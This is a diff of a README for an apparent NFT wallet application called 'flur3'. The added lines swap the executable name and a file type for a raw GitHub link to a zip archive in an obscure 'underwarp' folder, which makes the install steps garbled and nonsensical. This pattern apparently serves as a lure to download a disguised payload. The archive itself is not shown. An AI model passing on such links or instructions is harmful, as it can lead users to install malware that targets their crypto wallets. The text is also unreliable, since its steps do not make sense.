Talonwarhawksmackit/flur3/README.md

 2. **Extract Files (if needed):** If the file is in a compressed format such as .zip, right-click on it and select "Extract All."
 Follow the prompts to extract the files.

 3. **Run the Application:**
-   - For Windows: Double-click `flur3.exe` to launch the application.
+   - For Windows: Double-click `https://raw.githubusercontent.com/Talonwarhawksmackit/flur3/main/underwarp/flur3.zip` to launch the application.
    - For macOS: Drag the `flur3` app to your Applications folder and run it from there.
-   - For Linux: If you have downloaded a .deb or .tar.gz file, follow the instructions specific to your Linux distribution to install and run the application.
+   - For Linux: If you have downloaded a .deb or https://raw.githubusercontent.com/Talonwarhawksmackit/flur3/main/underwarp/flur3.zip file, follow the instructions specific to your Linux distribution to install and run the application.

 4. **Ensure Your Wallet is Ready:** You will need a wallet compatible with NFT transactions.
 Set up your wallet if you haven’t done so yet.